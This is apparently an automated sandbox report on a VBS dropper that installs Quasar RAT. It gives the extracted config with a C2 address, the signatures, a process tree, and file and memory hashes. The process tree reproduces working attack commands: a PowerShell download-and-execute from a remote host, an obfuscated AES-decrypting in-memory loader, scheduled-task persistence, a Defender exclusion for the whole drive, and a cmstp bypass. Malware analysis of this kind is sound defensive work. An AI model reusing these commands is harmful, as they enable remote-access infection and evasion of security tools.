Analysis

  • max time kernel
    91s
  • max time network
    96s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    09-12-2024 17:28

General

  • Target

    9273_output.vbs

  • Size

    1.6MB

  • MD5

    89444730511dcc04894433ad215e9f02

  • SHA1

    8af2c8469f0381666bbdfbb12965c48290ef817b

  • SHA256

    7bfbcbf1a30ba537264e189e39b2ada434fc451c99a7fe680aa6196cd931b625

  • SHA512

    121bcab2c0e4c0c307565742f03d4ebef33ba677f4591a2d95238c500c82fbeafd4d52521bdf57e0775178b081a95b877b561721ec72540b0beb4acf3548a19f

  • SSDEEP

    24576:prCPrx+7wnggpUvK3oVj1S1LYuhN0E7olLXm5ttA7AhazaJUelDBY1Qq0+BbUklh:g/rUTV40u3oli5LEgaaUKat0+BbeYz

Malware Config

Extracted

  • Family
    quasar
  • Version
    1.4.1
  • Botnet
    searchindexer
  • C2
    87.120.113.125:55644
  • Mutex
    0c021db0-bf71-4ae4-b9ae-2671afdea591

Attributes

  • encryption_key
    54717FCDBD30C7781F669403FBC8E35733C37E34
  • install_name
    searchindexer.exe
  • log_directory
    Logs
  • reconnect_delay
    3000
  • startup_key
    searchindexer
  • subdirectory
    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Runs PowerShell with a hidden display window.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9273_output.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2672
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3920
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3784
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u42ddkjb\u42ddkjb.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4832
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB0E1.tmp" "c:\Users\Admin\AppData\Local\Temp\u42ddkjb\CSCB4B94D97BDAD4930A34EDD783BCC59D1.TMP"
            5⤵
            PID:1184
        • C:\windows\system32\cmstp.exe
          "C:\windows\system32\cmstp.exe" /au C:\windows\temp\4yz3mvlr.inf
          4⤵
          PID:800
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2500
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:804
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_514_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx514.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2880
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx514.vbs"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:384
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx514.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:640
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx514.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1876
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "searchindexer" /sc ONLOGON /tr "C:\Program Files\SubDir\searchindexer.exe" /rl HIGHEST /f
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3148
              • C:\Program Files\SubDir\searchindexer.exe
                "C:\Program Files\SubDir\searchindexer.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:2184
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1076
  • C:\Windows\system32\taskkill.exe
    taskkill /IM cmstp.exe /F
    1⤵
    • Kills process with taskkill
    • Suspicious use of AdjustPrivilegeToken
    PID:3032

Network

MITRE ATT&CK Enterprise v15

Downloads

      • C:\Program Files\SubDir\searchindexer.exe

        Filesize

        440KB

        MD5

        0e9ccd796e251916133392539572a374

        SHA1

        eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

        SHA256

        c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

        SHA512

        e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        627073ee3ca9676911bee35548eff2b8

        SHA1

        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

        SHA256

        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

        SHA512

        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        900c7fac3ccd57351617c0b7e480dcf8

        SHA1

        262d1a39dc55644003ca46399845b0260ec83aee

        SHA256

        53250ca5ebb80432367e035099f602133ef1d97dee0147d428b6a3360cb29bdd

        SHA512

        f5786e5f38ef9ec8f5eb0e573c6c37fdbae24ae6bd04dfbed281e464d7605ab2e6acb9bb5a2fedd1c833bd101cbeadfe691b191863c67f68030cc0cd8db31999

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        81e0552d0827e0bf2d66737db6a93618

        SHA1

        cec19fc5b1ddaf567537a9c2fa43f84c0b3d4a2b

        SHA256

        a0009e1dc49436bd64750db3b642c378ca83b64b812ed3e494d0d72978384c56

        SHA512

        4972bedac6314b5e1be107ba7d0a7b4a3857f4a303ba6f7e803d1e0971f11dd5d21aa72783371c581a49ed17b4b499f8e05df8ad8af7badb65c73aa0a270148d

      • C:\Users\Admin\AppData\Local\Temp\RESB0E1.tmp

        Filesize

        1KB

        MD5

        98207a61f92becd98027457b72c6d437

        SHA1

        b1c754d80becf3d5da3dd168c44562e7a5a19bf3

        SHA256

        fe7371749676b9c61c615cddf32663c8770a981dc4d3417fe80b572e47dfe4c1

        SHA512

        c836a5e503e5a45675247dc282cae7b49bc0d7cc769c6203be487168bbfab80ac638ac8c5b4d198a27475ea5b8c77bbd606e49db0a7ad37bea9fdd27012f8173

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1fsenpgb.ore.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\c.bat

        Filesize

        1.6MB

        MD5

        63a0d558702bb4b4fdad3fbe2ffc0ac9

        SHA1

        c70f2444e8052e6495c42f179785da267acac50b

        SHA256

        c3c8a913470c637c51bc84cdaaf8eb23f52556ad289d57c79e9c9cfa7bf9f757

        SHA512

        7f7819c86ac7a74694dc77b21cb54ccbfc084d98554d880323ba460dc033492718f052041f001837c5412af52aa0c29a8a30125f8413276201643d516e052f10

      • C:\Users\Admin\AppData\Local\Temp\u42ddkjb\u42ddkjb.dll

        Filesize

        4KB

        MD5

        d64fcc44f020d3ffc7a3c57423423fe6

        SHA1

        1b851fd66543ce47e5c52349e9e32bc92b8cd1a1

        SHA256

        081a4b0fea0b3677c3b52c6fcc2995daee475c2ec65a410a03e15001e5866ef3

        SHA512

        4d2c1b1ff27763434c5515c3d08c3ce5882337d129e8babdc2425ee6e5bd77af67317b53d458402c297af32a938f543ab30038a7adcb49823da096f5ec007f9f

      • C:\Users\Admin\AppData\Roaming\latencyx514.vbs

        Filesize

        111B

        MD5

        8eeea54360ae08e53717cef8c880a5cc

        SHA1

        0fdd3f0f052f09a11ec05e170a4eac30d371c835

        SHA256

        a8b078e48937e47e0ecb5f3f9b879c407501f093cf5cfe0006e9283bac220eed

        SHA512

        882525ecc6999d91c72a4a848bbeadfdfc91862340fadc28d8b559b54d744ccff271e4024c9ed7d6a4945bb031426172edb1f4b91e6b4af7cd8949edf54b730a

      • C:\windows\temp\4yz3mvlr.inf

        Filesize

        683B

        MD5

        a4fd12b94ad4ac06fabd8dd56dd5ff2b

        SHA1

        940d129205e04ba31b10a72d7a7a236a9ed0488b

        SHA256

        fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

        SHA512

        a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

      • \??\c:\Users\Admin\AppData\Local\Temp\u42ddkjb\CSCB4B94D97BDAD4930A34EDD783BCC59D1.TMP

        Filesize

        652B

        MD5

        26f044589e7aa1136674d75c28987699

        SHA1

        60ace126a7aa0081ea4d74623daec2570ef038cf

        SHA256

        34c9837b43b6f99a3c4aaa86d181ca526a31c2d43a02262fc168090a179c70f6

        SHA512

        0dd3fe115a61cb807b870db63fd399457fc23f6735cc972f6fa5e33e299776b4b8478867a9857d6d068a5b21f89b87b3100a79c514068329ea185459801b4112

      • \??\c:\Users\Admin\AppData\Local\Temp\u42ddkjb\u42ddkjb.0.cs

        Filesize

        2KB

        MD5

        897ac4306f2a2524bc3c441bd00c72b9

        SHA1

        1703dbf9a2a78491dfd6685540d4691839e33b69

        SHA256

        a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

        SHA512

        2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

      • \??\c:\Users\Admin\AppData\Local\Temp\u42ddkjb\u42ddkjb.cmdline

        Filesize

        369B

        MD5

        adcf183989b19fa1a7e68c3d2c1c382a

        SHA1

        e17db207141c9ace4e7f175beb2650deff7420af

        SHA256

        a7d7dcd0ab2733aa465e644630c01c45a2afa4948dd1652a64e5ed1c8a4533ea

        SHA512

        16c4938398cc1256f1a03787950fa0df81b23443f8906d1e9c178f0f3099a38ce39431a8c2ac7ffd4151d486423709195b417c1e8e45fab0394996a86410ee14

      • memory/804-62-0x00000241CC470000-0x00000241CC5A2000-memory.dmp

        Filesize

        1.2MB

      • memory/804-61-0x00000241CC0A0000-0x00000241CC0A8000-memory.dmp

        Filesize

        32KB

      • memory/1876-89-0x000001E31E140000-0x000001E31E464000-memory.dmp

        Filesize

        3.1MB

      • memory/2184-103-0x00000270B9750000-0x00000270B9796000-memory.dmp

        Filesize

        280KB

      • memory/3784-26-0x0000025970E40000-0x0000025970E48000-memory.dmp

        Filesize

        32KB

      • memory/3784-47-0x00007FFDA3DE0000-0x00007FFDA48A2000-memory.dmp

        Filesize

        10.8MB

      • memory/3784-43-0x00007FFDA3DE0000-0x00007FFDA48A2000-memory.dmp

        Filesize

        10.8MB

      • memory/3784-42-0x00007FFDA3DE3000-0x00007FFDA3DE5000-memory.dmp

        Filesize

        8KB

      • memory/3784-0-0x00007FFDA3DE3000-0x00007FFDA3DE5000-memory.dmp

        Filesize

        8KB

      • memory/3784-13-0x0000025970E20000-0x0000025970E3C000-memory.dmp

        Filesize

        112KB

      • memory/3784-12-0x00007FFDA3DE0000-0x00007FFDA48A2000-memory.dmp

        Filesize

        10.8MB

      • memory/3784-11-0x00007FFDA3DE0000-0x00007FFDA48A2000-memory.dmp

        Filesize

        10.8MB

      • memory/3784-10-0x00007FFDA3DE0000-0x00007FFDA48A2000-memory.dmp

        Filesize

        10.8MB

      • memory/3784-9-0x0000025970910000-0x0000025970932000-memory.dmp

        Filesize

        136KB